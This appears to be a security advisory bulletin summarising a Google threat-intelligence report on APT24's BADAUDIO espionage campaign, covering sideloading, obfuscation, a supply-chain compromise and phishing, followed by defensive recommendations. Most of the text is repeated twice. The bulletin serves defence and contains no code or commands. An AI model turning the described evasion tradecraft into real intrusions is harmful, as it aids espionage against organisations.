APT24 Deploys BADAUDIO in Years-Long Espionage Hitting Taiwan and 1,000+ Domains
Summary:
Google Threat Intelligence Group is tracking a persistent, three-year PRC-nexus espionage campaign attributed to APT24, centered around a custom, heavily obfuscated downloader known as BADAUDIO. The actor’s operations have steadily evolved across multiple delivery vectors: early strategic web compromises targeting visitors of legitimate websites, a large-scale supply-chain compromise of a Taiwanese digital marketing firm affecting 1,000+ domains, and targeted phishing campaigns abusing trusted cloud services. BADAUDIO functions as a stealthy first-stage loader written in C++ that uses AES-encrypted C2 traffic, cookie-embedded host fingerprints, and control flow flattening to hinder static and dynamic analysis. It executes via DLL search-order hijacking and multi-file chains, dynamically placing the malicious DLL next to a legitimate executable to trigger sideloading. In several cases, BADAUDIO downloads and decrypts Cobalt Strike Beacon, which has been linked to a recurring watermark observed in other APT24 operations.
APT24’s web-based delivery heavily relies on browser fingerprinting, conditional payload delivery, and fake update prompts that selectively target Windows systems. The supply-chain compromise demonstrated both operational persistence and adaptive script modification, including hiding malicious JavaScript inside JSON files to evade detection. Concurrently, APT24’s phishing campaigns used personalized lures, cloud storage, encrypted archives, and pixel-tracking to validate victims and guide subsequent exploitation. Across all phases, the campaign reflects a sustained investment in stealth, infrastructure rotation, targeted delivery logic, and abuse of trusted services, hallmarks of modern PRC-nexus espionage operations. GTIG responded by placing domains/files on the Safe Browsing blocklist and notifying all affected organizations to help disrupt the campaign.
Security Officer Comments:
APT24 continues to demonstrate a mature, adaptive operational style that blends stealthy access vectors with large-scale delivery mechanisms. Their repeated use of browser fingerprinting, multi-layer script obfuscation, and DLL sideloading illustrates a high priority on reducing detection points and maintaining long-term access. The re-compromise of the Taiwanese marketing firm shows intent to control upstream distribution channels rather than isolated targets. The recurring Cobalt Strike watermark suggests internal tooling reuse across campaigns. Taken together, APT24’s behavior aligns with broader PRC trends toward low-noise initial access, supply-chain leverage, and precision targeting based on environmental profiling.
Suggested Corrections:
https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/
Google Threat Intelligence Group is tracking a persistent, three-year PRC-nexus espionage campaign attributed to APT24, centered around a custom, heavily obfuscated downloader known as BADAUDIO. The actor’s operations have steadily evolved across multiple delivery vectors: early strategic web compromises targeting visitors of legitimate websites, a large-scale supply-chain compromise of a Taiwanese digital marketing firm affecting 1,000+ domains, and targeted phishing campaigns abusing trusted cloud services. BADAUDIO functions as a stealthy first-stage loader written in C++ that uses AES-encrypted C2 traffic, cookie-embedded host fingerprints, and control flow flattening to hinder static and dynamic analysis. It executes via DLL search-order hijacking and multi-file chains, dynamically placing the malicious DLL next to a legitimate executable to trigger sideloading. In several cases, BADAUDIO downloads and decrypts Cobalt Strike Beacon, which has been linked to a recurring watermark observed in other APT24 operations.
APT24’s web-based delivery heavily relies on browser fingerprinting, conditional payload delivery, and fake update prompts that selectively target Windows systems. The supply-chain compromise demonstrated both operational persistence and adaptive script modification, including hiding malicious JavaScript inside JSON files to evade detection. Concurrently, APT24’s phishing campaigns used personalized lures, cloud storage, encrypted archives, and pixel-tracking to validate victims and guide subsequent exploitation. Across all phases, the campaign reflects a sustained investment in stealth, infrastructure rotation, targeted delivery logic, and abuse of trusted services, hallmarks of modern PRC-nexus espionage operations. GTIG responded by placing domains/files on the Safe Browsing blocklist and notifying all affected organizations to help disrupt the campaign.
Security Officer Comments:
APT24 continues to demonstrate a mature, adaptive operational style that blends stealthy access vectors with large-scale delivery mechanisms. Their repeated use of browser fingerprinting, multi-layer script obfuscation, and DLL sideloading illustrates a high priority on reducing detection points and maintaining long-term access. The re-compromise of the Taiwanese marketing firm shows intent to control upstream distribution channels rather than isolated targets. The recurring Cobalt Strike watermark suggests internal tooling reuse across campaigns. Taken together, APT24’s behavior aligns with broader PRC trends toward low-noise initial access, supply-chain leverage, and precision targeting based on environmental profiling.
Suggested Corrections:
- Enforce strict controls on DLL search paths and block untrusted DLL sideloading via EDR policies.
- Deploy detection for AES-encrypted cookie-based beaconing, unusual JavaScript loading, and FingerprintJS2/MurmurHash3 activity.
- Implement CSP + Subresource Integrity for all third-party web scripts; audit for unauthorized script/JSON modifications.
- Harden email defenses against cloud-storage–hosted encrypted archives and phishing lures; quarantine by default.
- Continuously block and monitor domains identified by GTIG Safe Browsing and investigate any associated host artifacts.
https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks/